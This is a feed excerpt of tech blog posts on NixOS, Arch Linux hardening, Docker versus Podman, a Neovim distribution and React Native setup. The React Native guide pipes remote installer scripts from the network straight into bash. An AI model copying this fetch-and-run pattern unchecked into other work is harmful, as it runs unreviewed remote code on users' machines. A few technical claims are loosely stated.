</li>
<li><p><a target="_blank" href="https://github.com/0xInfection/XSRFProbe">https://github.com/0xInfection/XSRFProbe</a></p>
</li>
<li><p><a target="_blank" href="https://excalidraw.com/">https://excalidraw.com/</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[❄️ NixOS: OS as Code]]></title><description><![CDATA[There are many Linux-based distributions out there, some are flashy, some are minimal, some are bloated (i guess we all hate those ones, lol). Then we have NixOS, a very fundamentally different Linux distro from all its other relatives. It can be sum...]]></description><link>https://blog.berzi.one/nixos</link><guid isPermaLink="true">https://blog.berzi.one/nixos</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 24 Mar 2024 14:52:37 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1711290328715/4c1649c8-9201-4b40-9b43-ce64cddc2dde.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>There are many Linux-based distributions out there, some are flashy, some are minimal, some are bloated (i guess we all hate those ones, lol). Then we have NixOS, a very fundamentally different Linux distro from all its other relatives. It can be summarized in three words: declarative, reproducible, and immutable.</p>
<h2 id="heading-declarative">Declarative</h2>
<p>Let's start with the first attribute. NixOS's declarative configuration makes it easy to describe the various components of our operating system in an easy-to-understand language called Nix, whose syntax is very similar to JSON.<br />To declare the NixOS config, we write a file called <code>configuration.nix</code>, stored in <code>/etc/nixos/</code>:</p>
<pre><code class="lang-nix">{
  <span class="hljs-attr">imports</span> =
    [ <span class="hljs-comment"># Include the results of the hardware scan.</span>
      ./hardware-configuration.nix

    ];

  <span class="hljs-comment"># Bootloader.</span>
  boot.loader.systemd-boot.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;
  boot.loader.efi.<span class="hljs-attr">canTouchEfiVariables</span> = <span class="hljs-literal">true</span>;

  networking.<span class="hljs-attr">hostName</span> = <span class="hljs-string">"endernix"</span>; <span class="hljs-comment"># Define your hostname...</span>
  <span class="hljs-comment"># Enable networking</span>
  networking.networkmanager.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;

  <span class="hljs-comment"># Enable docker</span>
  virtualisation.docker.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;

  <span class="hljs-comment"># Enable bluetooth</span>
  hardware.bluetooth.<span class="hljs-attr">enable</span> = <span class="hljs-literal">true</span>;
  hardware.bluetooth.<span class="hljs-attr">powerOnBoot</span> = <span class="hljs-literal">true</span>;
...
}
</code></pre>
<p>The comments above each line or chunk of code describe their functionality. For example, the Bluetooth chunk describes that when re-building the system again, it needs to enable and start the bluetooth service on boot. We'll get into rebuilds later on, but how do we install packages? Easy. we declare it in the same file.  </p>
<pre><code class="lang-nix">{ ...
users.users.<span class="hljs-attr">ifkash</span> = {
    <span class="hljs-attr">isNormalUser</span> = <span class="hljs-literal">true</span>;
    <span class="hljs-attr">description</span> = <span class="hljs-string">"Kashif"</span>;
    <span class="hljs-attr">extraGroups</span> = [ <span class="hljs-string">"networkmanager"</span> <span class="hljs-string">"wheel"</span> <span class="hljs-string">"docker"</span> ];
    <span class="hljs-attr">packages</span> = <span class="hljs-keyword">with</span> pkgs; [
      <span class="hljs-comment"># Browsers</span>
      brave
      firefox
      google-chrome
      <span class="hljs-comment"># Fetch tools</span>
      neofetch
      sysfetch
      nitch
    ];
};

...
}
</code></pre>
<p>These blocks can be placed anywhere in the file, because Nix is a purely functional language, which in layman's terms means the order in which definitions appear does not matter.</p>
<h2 id="heading-reproducibility">Reproducibility</h2>
<p>Once the configuration file is written, it's time to build or modify the system. Running <code>sudo nixos-rebuild switch</code> reads the entire configuration file and builds a new system generation accordingly. Now comes the question: if I simply add a few small packages, will the new generation take nearly double the disk space of the previous one? The answer is no.</p>
<h3 id="heading-nixstore">/nix/store</h3>
<p>The Nix store is where the system keeps every built package, each in a directory whose name carries a hash of the package and its dependencies. Whenever the system is rebuilt, anything whose hash is already present in the store is simply reused; only packages that are new or changed are built and added.</p>
<p>We can also go back to our previous build with <code>nixos-rebuild --rollback switch</code>.</p>
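<p>The idea behind those hashed store paths can be sketched in a few lines. This is only a toy model of the scheme: real Nix hashes the full derivation (sources, build flags, dependency closure) and uses a different path encoding, and the package names below are invented:</p>

```python
import hashlib

def store_path(name, inputs):
    # same name + same inputs -> same path, so an unchanged package is reused;
    # any change to the inputs yields a brand-new path instead of an overwrite
    digest = hashlib.sha256(repr(sorted(inputs)).encode()).hexdigest()[:32]
    return f"/nix/store/{digest}-{name}"

print(store_path("firefox-124.0", ["glibc-2.38", "gtk3-3.24"]))
```

Because old paths are never overwritten, previous generations keep pointing at their original store paths, which is exactly what makes rollbacks safe.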
<h3 id="heading-rollbacks-never-break-your-system-again">Rollbacks - Never break your system again</h3>
<p>Hence, in case our new system breaks for some reason, we can always switch back to the previous generation and get our work done. This feature gives NixOS a decisive advantage over distros like Arch Linux.</p>
<h2 id="heading-immutability">Immutability</h2>
<p>Since the system is defined declaratively, the existing system state cannot be modified in place (by updating or upgrading individual packages, for example); changes require editing the configuration and rebuilding. This is not a bug but a feature: it adds further safety against breaking our systems, and it makes the system more resistant to attacks that try to change ownership permissions or corrupt the system's boot files.</p>
<h2 id="heading-the-nix-package-manager">The Nix package manager</h2>
<p>The Nix package manager fetches from the Nix package repository, one of the largest package collections of any operating system; it even beats Arch's user repository, well known for its enormous package selection. Hence, Nix boasts better software support than most operating systems on the planet.</p>
<p>You can search your favorite packages here: <a target="_blank" href="https://search.nixos.org/packages">https://search.nixos.org/packages</a></p>
<h2 id="heading-why-use-nixos-as-a-daily-driver">Why use NixOS as a daily driver?</h2>
<p>Apart from excellent software support and all its other features, NixOS doesn't feel different from other Linux distros at all on the surface. There's that feel-at-home, works-out-of-the-box feeling. And now that NixOS's installation ISO ships with the graphical Calamares installer, installing it is easier than ever.</p>
<h2 id="heading-acknowledgements">Acknowledgements</h2>
<ul>
<li><p><a target="_blank" href="https://nixos.org/">https://nixos.org/</a></p>
</li>
<li><p><a target="_blank" href="https://github.com/kashifulhaque/nixos-config">https://github.com/kashifulhaque/nixos-config</a></p>
</li>
<li><p><a target="_blank" href="https://ianthehenry.com/posts/how-to-learn-nix/">https://ianthehenry.com/posts/how-to-learn-nix/</a></p>
</li>
<li><p><a target="_blank" href="https://www.youtube.com/@vimjoyer">https://www.youtube.com/@vimjoyer</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🩸Arch Linux: Cutting edge SecOps]]></title><description><![CDATA[The series focuses heavily on Linux, especially Arch, because it is one of the most minimal and hence most universally adaptable distribution of Linux. Arch based distributions also come with some superpowers that other distros like debian don't prov...]]></description><link>https://blog.berzi.one/uniqueness-of-arch-linux</link><guid isPermaLink="true">https://blog.berzi.one/uniqueness-of-arch-linux</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 21 Jan 2024 09:11:42 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1705827084794/1b99b1ad-0077-4eb8-a465-c4ca9c240166.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The series focuses heavily on Linux, especially Arch, because it is one of the most minimal and hence most universally adaptable distribution of Linux. Arch based distributions also come with some superpowers that other distros like debian don't provide. Let's take a deep dive into those exquisite abilities on this day.</p>
<h3 id="heading-arch-wiki">Arch Wiki</h3>
<p>The ultimate manual for anything Arch-related. The Arch Wiki and Arch forums have everything you need regarding any issue you're facing or any mods you want to make to Arch. Let's say you want to install GNOME on an Arch install that runs KDE Plasma but don't know exactly how to do it: just search your issue with the suffix "arch wiki" in Google.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705827310455/1096c746-40cc-4a1f-872a-b1222ce8d76a.png" alt class="image--center mx-auto" /></p>
<p>The instructions rarely get outdated, as the wiki is regularly updated with the latest information by the community (which is public and open). Sometimes the solutions proposed in Arch Wiki pages even work on non-Arch distributions, if the problem is not distro-specific.</p>
<h3 id="heading-arch-user-repository-aur">Arch User Repository (AUR)</h3>
<p>The AUR is the community-maintained registry of Arch Linux packages. It is ginormous in its variety: you can install almost any package from the AUR, be it Spotify, Discord, or even Google Chrome!</p>
<h4 id="heading-aur-helpers">AUR helpers</h4>
<p>Installing a package from the AUR requires you to clone the repo and run the build command <code>makepkg -si</code>, which reads the package's <code>PKGBUILD</code> file.</p>
<p>The <code>PKGBUILD</code> acts as a blueprint for building the package and installing it into the system.</p>
<p>AUR helpers automate this build process; popular ones include <code>yay</code> and <code>paru</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705828073036/37633216-0338-45cc-bfa7-b271b32be751.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-minimalism">Minimalism</h3>
<p>Arch Linux provides us with the power to start from a minimal installation, which means that we decide what goes into our system, including even the kernel!</p>
<p>This helps avoid bloatware and enables a lightning-fast system, especially for developers who combine their workflow with the clax.nvim Neovim configuration.</p>
<h3 id="heading-self-development">Self-development</h3>
<p>Installing Arch teaches us not only about partitioning, different kinds of file systems, keymapping, audio servers, and daemons, but also builds a basic overview of the foundations of an operating system.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1705828104991/d94fcd76-5f5b-4add-b28c-11bcdd642492.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-bleeding-edge-updates">Bleeding-edge updates</h3>
<p>This is also a double-edged sword. Bleeding-edge updates mean that all of the system's packages are updated to the very latest version: if Neovim's version on Debian is 0.6.1, it is 0.9.1 on Arch Linux. But it also means that, despite supporting newer technologies like Lua configs in Neovim, software (and hence the system) may risk breaking because packages are so new that incompatibilities with other software or even hardware have not yet been shaken out.</p>
<p>Maintenance is also needed in Arch Linux, so we need to regularly make sure the system is updated. This is not an issue because it helps us stay more conscious of our system's workings.</p>
<h2 id="heading-security-implementations">Security Implementations</h2>
<p>In an era where digital threats are constantly evolving, prioritizing the security of your system is paramount. This blog will delve into various aspects of enhancing security, covering essential topics such as drive encryption, file systems, firewalls, and secure boot. By incorporating robust security measures, you can significantly reduce the risk of unauthorized access, data breaches, and other potential threats.</p>
<h4 id="heading-drive-encryption-withcryptsetup"><strong>Drive Encryption with</strong><code>cryptsetup</code><strong>:</strong></h4>
<p>Drive encryption is a fundamental step towards securing your data. The use of <code>cryptsetup</code>, a utility for setting up encrypted filesystems, ensures that even if someone gains physical access to your storage device, they won't be able to access sensitive information without the encryption key.</p>
<p>To implement drive encryption with <code>cryptsetup</code>, follow these steps:</p>
<ul>
<li><p>Install <code>cryptsetup</code> on your system.</p>
</li>
<li><p>Use the <code>cryptsetup</code> command to create an encrypted container or encrypt an existing partition.</p>
</li>
<li><p>Set up a strong passphrase or keyfile for added security.</p>
</li>
</ul>
<p><strong>Understanding the </strong><code>btrfs</code><strong> File System:</strong></p>
<p>The choice of a file system plays a crucial role in system security. The Btrfs (B-Tree File System) is a modern and feature-rich file system that offers advantages over traditional ones like ext4. <code>btrfs</code> provides improved data integrity, efficient snapshots, and support for advanced storage technologies.</p>
<p>Compare <code>btrfs</code> with <code>ext4</code>:</p>
<ul>
<li><p><code>btrfs</code> supports advanced features like snapshots, copy-on-write, and checksums.</p>
</li>
<li><p><code>ext4</code> is a mature and stable file system with a long history of reliability.</p>
</li>
<li><p>Consider your specific use case and requirements before choosing between <code>btrfs</code> and <code>ext4</code>.</p>
</li>
</ul>
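<p>To illustrate one of those advanced features, here is a hedged sketch of taking a read-only snapshot of a subvolume with <code>btrfs</code>; the paths <code>/home</code> and <code>/.snapshots</code> are assumptions about your subvolume layout.</p>
<pre><code class="lang-bash">sudo btrfs subvolume create /.snapshots                         # a place to keep snapshots
sudo btrfs subvolume snapshot -r /home /.snapshots/home-backup  # read-only snapshot of /home
sudo btrfs subvolume list /                                     # verify it was created
</code></pre>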
<h4 id="heading-configuring-ufw-firewall"><strong>Configuring ufw Firewall:</strong></h4>
<p>A firewall is a critical component in safeguarding your system from network threats. Uncomplicated Firewall (ufw) is a user-friendly interface for managing iptables, the default Linux firewall. By enabling ufw, you can control incoming and outgoing traffic, thereby fortifying your system against potential attacks.</p>
<p>To set up <code>ufw</code>:</p>
<ul>
<li><p>Install <code>ufw</code> on your system.</p>
</li>
<li><p>Define rules for allowing or blocking specific traffic.</p>
</li>
<li><p>Enable <code>ufw</code> to start on system boot for continuous protection.</p>
</li>
</ul>
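<p>The steps above can be sketched as the commands below; the rule set shown (deny incoming, allow outgoing, allow SSH) is just one sensible default, not a universal recommendation.</p>
<pre><code class="lang-bash">sudo pacman -S ufw                 # install ufw
sudo ufw default deny incoming     # block unsolicited inbound traffic
sudo ufw default allow outgoing    # permit outbound traffic
sudo ufw allow ssh                 # keep remote access open if you need it
sudo ufw enable                    # activate the firewall
sudo systemctl enable ufw.service  # start it on every boot
sudo ufw status verbose            # confirm the active rules
</code></pre>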
<h4 id="heading-secure-boot-withsbctl"><strong>Secure Boot with </strong><code>sbctl</code><strong>:</strong></h4>
<p>Secure Boot is a security feature that ensures the integrity of the boot process, preventing the loading of unauthorized or tampered code during system startup. <code>sbctl</code> is a tool for managing Secure Boot settings on Linux systems.</p>
<p>To enable Secure Boot with <code>sbctl</code>:</p>
<ul>
<li><p>Check if your system supports Secure Boot.</p>
</li>
<li><p>Put Secure Boot into setup mode by deleting all Secure Boot variables.</p>
</li>
<li><p>Generate and enroll Secure Boot keys.</p>
</li>
<li><p>Use <code>sbctl</code> to configure and enable Secure Boot.</p>
</li>
</ul>
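<p>A minimal sketch of those steps with <code>sbctl</code> follows. The kernel path <code>/boot/vmlinuz-linux</code> is an assumption about your boot layout, and enrolling keys on some firmware can brick hardware, so check your vendor documentation first.</p>
<pre><code class="lang-bash">sbctl status                            # check Secure Boot and setup-mode state
sudo sbctl create-keys                  # generate your own signing keys
sudo sbctl enroll-keys -m               # enroll them (-m also keeps Microsoft's keys)
sudo sbctl sign -s /boot/vmlinuz-linux  # sign the kernel; -s re-signs it on updates
sbctl verify                            # confirm everything that needs signing is signed
</code></pre>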
<p>In today's digital landscape, prioritizing security is non-negotiable. By implementing robust measures such as drive encryption, choosing advanced file systems like Btrfs, configuring firewalls, and enabling Secure Boot, you significantly enhance the protection of your system. Regularly updating and auditing these security measures will ensure that your defenses remain strong against evolving threats.</p>
<h3 id="heading-documentations">Documentation</h3>
<ul>
<li><p><a target="_blank" href="https://docs.kernel.org/filesystems/btrfs.html">https://docs.kernel.org/filesystems/btrfs.html</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/dm-crypt/Device_encryption">https://wiki.archlinux.org/title/dm-crypt/Device_encryption</a></p>
</li>
<li><p><a target="_blank" href="https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot">https://wiki.archlinux.org/title/Unified_Extensible_Firmware_Interface/Secure_Boot</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🤖 Virtualising machines]]></title><description><![CDATA[Virtual Machines and Containers are two of the most essential technologies for isolated environments and modern cloud architecture in data centers. They provide a replicable development/deployment environment for software. Despite both existing as an...]]></description><link>https://blog.berzi.one/virtualising-machines</link><guid isPermaLink="true">https://blog.berzi.one/virtualising-machines</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Sun, 14 Jan 2024 14:08:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1705239516544/17a17696-a558-4adf-bc1d-0d4e79a2ec71.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Virtual machines and containers are two of the most essential technologies for isolated environments and modern cloud architecture in data centers. Both provide a replicable development/deployment environment for software. Despite both existing as an abstraction layer above the host system, they differ conceptually in factors like architecture, speed and resource footprint.</p>
<h3 id="heading-virtual-machines">Virtual Machines</h3>
<p>Virtual Machines are specialized environments that emulate a computer operating system. They can be further specialized to deploy particular software. Let's think of running an OS like Linux, but over the host system running Windows. Here, Linux will be treated as a "Guest OS" and will be running atop Windows as an Application.</p>
<p>Virtual machines are governed by a type of software called a "hypervisor", which controls their deployment.</p>
<p><img src="https://www.data-storage.uk/wp-content/uploads/2022/03/hypervisor.jpg" alt="Understanding a hypervisor the simple way - Data Storage Solutions" /></p>
<p>Hypervisors also enable us to distribute hardware resources among virtual machines according to preference. If we have a 128GB RAM server and a lot of clients that want to access it, we would split the hardware resource among several virtual machines, so that each client gets their own isolated space and OS to run with a particular quantity of machine resources (like CPU and memory) allotted to them.</p>
<h3 id="heading-what-can-be-improved">What can be improved</h3>
<p><img src="https://www.baeldung.com/wp-content/uploads/sites/4/2021/05/os-kernel-2.png" alt="What Is an OS Kernel? | Baeldung on Computer Science" /></p>
<p>An Operating system in general consists of two stacked layers over the hardware.</p>
<p>Going from top to bottom, we first encounter the OS Applications layer, which consists of all the software run on the machine.</p>
<p>Secondly, we get the OS kernel, the layer that deals with communication with hardware resources, and acts as a bridge between the hardware and the OS Applications layer.</p>
<p>A virtual machine emulates both the OS kernel and the applications layer, stacked in the mentioned order. This results in excessive use of resources; however, there is a solution: we can use the host's kernel instead of running multiple kernels altogether.</p>
<h3 id="heading-enter-containers">Enter: Containers</h3>
<p>With the added advantage of using the host's kernel, containers save on resources and boost speed. Docker is used here specifically because it's one of the most popular tools and the one that revolutionized this category; its registry, Docker Hub, is also one of the largest repositories for pulling dependencies for your project.</p>
<p><img src="https://images.contentstack.io/v3/assets/blt300387d93dabf50e/bltb6200bc085503718/5e1f209a63d1b6503160c6d5/containers-vs-virtual-machines.jpg" alt="Docker vs Virtual Machines (VMs) : A Practical Guide to Docker Containers  and VMs" /></p>
<p>We have a container engine that manages these containers, or isolated environments, just like a hypervisor manages virtual machines.</p>
<h2 id="heading-spinning-up-a-new-container">Spinning up a new container</h2>
<p>Docker can be installed through the official set of instructions on their <a target="_blank" href="https://docs.docker.com/engine/install/">site</a>.</p>
<p>It uses the Docker Engine, whose Docker daemon is responsible for all processes concerning containers.</p>
<p>There are two options: either pull an existing image from Docker's registry, <a target="_blank" href="https://hub.docker.com/">Docker Hub</a>, or build a custom image to suit our project's needs.</p>
<h3 id="heading-using-existing-images">Using existing images</h3>
<p>To pull a Docker image off Docker Hub:</p>
<pre><code class="lang-bash">docker pull &lt;image_name&gt;:&lt;version&gt;
</code></pre>
<p>We can list downloaded images and their IDs with the <code>docker images</code> command. To create and start a container from an image, use <code>docker run</code> (note that <code>docker start</code> only restarts an already-created container):</p>
<pre><code class="lang-bash">docker run &lt;image_name&gt;:&lt;version&gt;
</code></pre>
<h3 id="heading-building-a-custom-image">Building a custom image</h3>
<p>In order to build a custom image, a blueprint file called a <code>Dockerfile</code> needs to be added to the project directory. This will contain all the configuration code, regarding what dependency versions and base image (which is the OS image that will be emulated) will be included in the container.</p>
<p>A typical <code>Dockerfile</code> would look somewhat similar to the one below.</p>
<pre><code class="lang-dockerfile"><span class="hljs-keyword">FROM</span> &lt;primary_service&gt;:&lt;base_image&gt;
<span class="hljs-keyword">COPY</span><span class="bash"> &lt;<span class="hljs-built_in">source</span> code directory&gt; /app/</span>
<span class="hljs-keyword">WORKDIR</span><span class="bash"> &lt;the working directory&gt;</span>
<span class="hljs-keyword">RUN</span><span class="bash"> &lt;any terminal commands&gt;</span>
</code></pre>
<p>Now that the blueprint is made, it's time to build an image with this configuration.</p>
<pre><code class="lang-bash">docker build -t &lt;image_name&gt; &lt;path_to_build_context&gt;
</code></pre>
<p>This builds a Docker image following the blueprint (the build context is the directory containing the <code>Dockerfile</code>, often just <code>.</code>); the image can then be pushed to Docker Hub or any registry to ship it to other environments and servers.</p>
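<p>Putting the workflow together, a hedged end-to-end sketch might look like this; the image name <code>myapp</code>, the port, and the registry user are placeholders, not values from this post.</p>
<pre><code class="lang-bash">docker build -t myapp:1.0 .                      # build from the Dockerfile in the current directory
docker run --rm -p 8080:8080 myapp:1.0           # create and start a container from the image
docker tag myapp:1.0 &lt;registry_user&gt;/myapp:1.0   # name it for a registry
docker push &lt;registry_user&gt;/myapp:1.0            # ship it to Docker Hub
</code></pre>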
<h3 id="heading-week-2-extra-docker-vs-podman">Week 2 Extra: Docker Vs. Podman</h3>
<p>Podman is a popular alternative to Docker, and arguably aims to succeed it. It has now been adopted for use alongside container orchestration tools like Kubernetes.</p>
<h4 id="heading-the-advantage">The Advantage</h4>
<ul>
<li><p>Podman does not require root/admin privileges to build/run containers (rootless operation), which makes it safer for the deployment system.</p>
</li>
<li><p>Unlike Docker, which uses a daemon (background service) that constantly listens for new requests in a client-server architecture, Podman has a daemonless architecture and hence saves system resources.</p>
</li>
<li><p>Almost all Docker commands work with Podman if you replace the word "docker" with "podman" (at least as far as the CLI is concerned).</p>
</li>
<li><p>Podman isn't a monolithic piece of software, unlike Docker; it builds on existing system software like systemd, and hence it is more lightweight.</p>
</li>
</ul>
<p>In summary, Podman is overall a safer alternative to Docker.</p>
<h3 id="heading-some-extra-reads">Some Extra Reads:</h3>
<ul>
<li><p><a target="_blank" href="https://www.imaginarycloud.com/blog/podman-vs-docker/">https://www.imaginarycloud.com/blog/podman-vs-docker/</a></p>
</li>
<li><p><a target="_blank" href="https://berzi.hashnode.dev/containers-and-virtualization-with-docker">https://berzi.hashnode.dev/containers-and-virtualization-with-docker</a></p>
</li>
<li><p><a target="_blank" href="https://docs.podman.io/en/latest/">https://docs.podman.io/en/latest/</a></p>
</li>
<li><p><a target="_blank" href="https://www.vmware.com/in/topics/glossary/content/virtual-machine.html">https://www.vmware.com/in/topics/glossary/content/virtual-machine.html</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[🐲 Clax.nvim: A Lightning-Fast Neovim Distribution]]></title><description><![CDATA[Neovim enthusiasts, rejoice! Today, we're excited to introduce Clax.nvim, a carefully crafted Neovim distribution designed for speed, simplicity, and customization. Whether you're a seasoned developer or just starting with Neovim, Clax.nvim promises ...]]></description><link>https://blog.berzi.one/claxnvim-a-lightning-fast-neovim-distribution</link><guid isPermaLink="true">https://blog.berzi.one/claxnvim-a-lightning-fast-neovim-distribution</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Thu, 11 Jan 2024 16:25:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704989076254/d8365b99-6814-47d6-a195-3f73dc2e7d74.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Neovim enthusiasts, rejoice! Today, we're excited to introduce Clax.nvim, a carefully crafted Neovim distribution designed for speed, simplicity, and customization. Whether you're a seasoned developer or just starting with Neovim, Clax.nvim promises to deliver a seamless and efficient editing experience. Let's dive into the key features, installation instructions, and usage guide to get you started on your coding journey with Clax.nvim.</p>
<h2 id="heading-what-is-claxnvim">What is Clax.nvim?</h2>
<p>Clax.nvim is not just another Neovim configuration; it's a distribution tailored for performance and ease of use. Named in homage to a friend (in a humorous attempt to convince them to install Arch Linux), Clax.nvim aims to be a lightweight and user-friendly choice for Neovim users. Let's explore what makes Clax.nvim stand out.</p>
<h2 id="heading-features">Features:</h2>
<h3 id="heading-1-blazing-speed">1. Blazing Speed:</h3>
<p>Clax.nvim is optimized for speed, ensuring a snappy and responsive editing environment, even when dealing with large codebases. Experience the joy of efficient coding without any compromise on performance.</p>
<h3 id="heading-2-lightweight-design">2. Lightweight Design:</h3>
<p>Say goodbye to unnecessary bloat! Clax.nvim keeps things minimal, providing a streamlined setup that offers both performance and simplicity. Enjoy the power of Neovim without the baggage.</p>
<h3 id="heading-3-user-friendly-interface">3. User-Friendly Interface:</h3>
<p>Designed with beginners in mind, Clax.nvim offers an intuitive configuration that's easy to understand and use right out of the box. Whether you're a coding veteran or a novice, Clax.nvim adapts to your workflow.</p>
<h3 id="heading-4-customizable">4. Customizable:</h3>
<p>Tailor your Neovim experience to your preferences with extensive customization options. Whether you're a minimalist or a power user, Clax.nvim allows you to shape your coding environment to suit your needs.</p>
<h3 id="heading-5-packernvim-integration">5. Packer.nvim Integration:</h3>
<p>Effortlessly manage plugins with Packer.nvim, ensuring a clean and organized configuration that's easy to maintain. Clax.nvim leverages the power of Packer.nvim for efficient plugin management.</p>
<h2 id="heading-installation">Installation:</h2>
<p>Getting started with Clax.nvim is a breeze. Follow these simple steps to set up your Neovim environment:</p>
<ol>
<li><p><strong>Clone Packer.nvim and Source Files:</strong></p>
<pre><code class="lang-bash"> mkdir ~/.config/nvim

 git <span class="hljs-built_in">clone</span> --depth 1 https://github.com/wbthomason/packer.nvim \
 ~/.<span class="hljs-built_in">local</span>/share/nvim/site/pack/packer/start/packer.nvim

 git <span class="hljs-built_in">clone</span> -b dev --depth 1 https://github.com/spirizeon/clax.nvim
</code></pre>
</li>
<li><p><strong>Install Packer Modules:</strong></p>
<pre><code class="lang-bash"> <span class="hljs-built_in">cd</span> clax.nvim
 cp init.lua ~/.config/nvim/
 nvim +PackerInstall <span class="hljs-comment"># Press [ENTER] at any prompts</span>
</code></pre>
</li>
<li><p><strong>Set the Custom Theme and Update the Config:</strong></p>
<pre><code class="lang-bash"> cp clax.lua ~/.<span class="hljs-built_in">local</span>/share/nvim/site/pack/packer/start/startup.nvim/lua/startup/themes/
</code></pre>
</li>
<li><p><strong>Install Treesitter Modules:</strong></p>
<pre><code class="lang-bash"> nvim <span class="hljs-comment"># Open Neovim to install treesitter modules</span>
 nvim +PackerSync <span class="hljs-comment"># Press [ENTER] at any prompts</span>
</code></pre>
</li>
<li><p><strong>Exit and Restart Neovim:</strong></p>
<pre><code class="lang-bash"> nvim
</code></pre>
</li>
</ol>
<p>Now you're ready to enjoy the speed and features of Clax.nvim!</p>
<h2 id="heading-configuration">Configuration:</h2>
<p>Explore the <code>init.lua</code> file to customize keybindings, plugins, and other settings to suit your workflow. The Packer.nvim integration provides a clean and organized way to manage your plugins. Take your time to fine-tune Clax.nvim to your liking.</p>
<h2 id="heading-usage-and-keymaps">Usage and Keymaps:</h2>
<p>Clax.nvim comes with pre-configured keymaps for popular plugins. Here are some keybindings to enhance your Neovim experience:</p>
<ul>
<li><p><code>&lt;leader&gt;ff</code>: Open Telescope and find files.</p>
</li>
<li><p><code>&lt;leader&gt;lg</code>: Use Telescope to perform a live grep.</p>
</li>
<li><p><code>&lt;leader&gt;fb</code>: Switch between open buffers with Telescope.</p>
</li>
<li><p><code>&lt;leader&gt;of</code>: Access and navigate old files with Telescope.</p>
</li>
<li><p><code>&lt;leader&gt;nf</code>: Create a new file with a single command.</p>
</li>
</ul>
<p>Feel free to explore more keymaps and commands in the configuration to make the most out of Clax.nvim.</p>
<h2 id="heading-uninstall">Uninstall:</h2>
<p>If you ever decide to part ways with Clax.nvim, uninstalling is a breeze. Simply run the following command:</p>
<pre><code class="lang-bash">rm -rf ~/.config/nvim ~/.<span class="hljs-built_in">local</span>/share/nvim
</code></pre>
<h2 id="heading-contribute">Contribute:</h2>
<p>We welcome contributions from the Neovim community! Whether it's bug fixes, new features, or optimizations, feel free to open issues and pull requests on our <a target="_blank" href="https://github.com/spirizeon/clax.nvim">GitHub repository</a>.</p>
<p>Join our growing community and help make Clax.nvim even better!</p>
<p>Happy coding! 🚀</p>
]]></content:encoded></item><item><title><![CDATA[🧑‍💻 React Native CLI for Linux]]></title><description><![CDATA[For the setup of environment of "React Native" on the Debian based distros you have to follow the following steps .
This part of the setup is only for the general installation 
without any errors.


First you need to visit this VoltaJs to install nod...]]></description><link>https://blog.berzi.one/react-native-cli-for-linux</link><category><![CDATA[React Native]]></category><category><![CDATA[linux for beginners]]></category><dc:creator><![CDATA[Yash Mehrotra]]></dc:creator><pubDate>Wed, 10 Jan 2024 14:10:58 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1704895833253/559f73ad-2cf6-4af3-a0c0-ff5ff796fbcc.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>To set up the environment for React Native on Debian-based distros, follow these steps.</p>
<pre><code class="lang-plaintext">This part of the setup is only for the general installation 
without any errors.
</code></pre>
<ul>
<li><p>First you need to visit <a target="_blank" href="https://volta.sh/">Volta</a> to install Node from it (I suggest Volta because it's a good version manager for Node versions).</p>
<p>  OR</p>
<p>  You can follow these commands to install VoltaJs and then Node</p>
<pre><code class="lang-bash">  <span class="hljs-comment"># install Volta</span>
  curl https://get.volta.sh | bash

  <span class="hljs-comment">#To execute the paths in Bashrc</span>
  <span class="hljs-built_in">source</span> ~/.bashrc

  <span class="hljs-comment"># install Node</span>
  volta install node

  <span class="hljs-comment"># Check the Version of node</span>
  node --version
</code></pre>
</li>
<li><p>Then, after installing Node, you need to install SDKMAN from its website, <a target="_blank" href="https://sdkman.io/">SDKman</a>, to install Java with it (I suggest SDKMAN because it's a good version manager for Java versions).</p>
<p>  OR</p>
<pre><code class="lang-bash">  <span class="hljs-comment"># To install SDKman in your system</span>
  curl -s <span class="hljs-string">"https://get.sdkman.io"</span> | bash

  <span class="hljs-comment"># To execute the paths in Bashrc</span>
  <span class="hljs-built_in">source</span> ~/.bashrc

  <span class="hljs-comment"># To check the versions of JAVA </span>
  sdk list java

  <span class="hljs-comment"># To install the Java version 17.0.9 (recommended stable)</span>
  sdk install java 17.0.9-ms
</code></pre>
</li>
<li><p>After the installation of Java you need to install Android Studio; you can install it from <a target="_blank" href="https://developer.android.com/studio?gclid=Cj0KCQiAnfmsBhDfARIsAM7MKi3-LhB2iS3VDTX5F--OA_Cwm_azPDHyh-6ISQPjzsDk6UiBV8R7xY0aAlNnEALw_wcB&amp;gclsrc=aw.ds">Android Studio</a></p>
</li>
<li><p>After the installation of Android Studio you need to install all the SDK tools as indicated in the following images (<mark>ticked ones only</mark>)</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1704893844371/fb6e5f82-c274-4f77-bbde-9ef0173b901c.png" alt class="image--center mx-auto" /></p>
